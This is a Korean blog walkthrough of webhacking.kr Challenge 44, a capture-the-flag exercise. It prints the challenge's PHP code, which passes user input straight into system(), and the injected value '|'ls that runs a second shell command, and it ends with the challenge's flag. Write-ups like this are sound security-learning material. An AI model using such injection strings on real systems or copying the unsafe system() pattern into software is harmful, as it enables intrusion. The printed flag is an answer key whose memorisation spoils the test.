반응형
https://webhacking.kr/chall.php
Webhacking.kr
webhacking.kr
[문제]
[풀이]
소스코드를 확인한다.
<?php
if($_GET['view_source']){ highlight_file(__FILE__); exit; }
?><html>
<head>
<title>Challenge 44</title>
</head>
<body>
<?php
if($_POST['id']){
$id = $_POST['id'];
$id = substr($id,0,5);
system("echo 'hello! {$id}'"); // You just need to execute ls
}
?>
<center>
<form method=post action=index.php name=htmlfrm>
name : <input name=id type=text maxlength=5><input type=submit value='submit'>
</form>
<a href=./?view_source=1>view-source</a>
</center>
</body>
</html>해석하면 입력받은 값을 hello! [입력값]으로 나타내는 문제인데.
주석으로 힌트가 있습니다. ls 명령어를 사용하면 문제가 풀릴 것 같습니다.
입력된 값은 echo 명령어 안에서 출력됩니다.
ls 실행값을 출력하기 위해서
system("echo 'hello!'|'ls'");이런식으로 실행하면 될 것 같습니다.
'|'ls 를 입력해줍니다.
위처럼 ls명령어가 실행되고 flag_...의 경로가 나타납니다.
위 경로로 이동해줍니다.
이동하면 Flag값을 확인할 수 있습니다.
(#Flag값이 유튜브 주소여서 들어가보니 ...
일본 OST가 나오네요
궁금하시면 직접 들어가보세요)
[FLAG]
FLAG{y2u.be/sW3RT0tF020}반응형
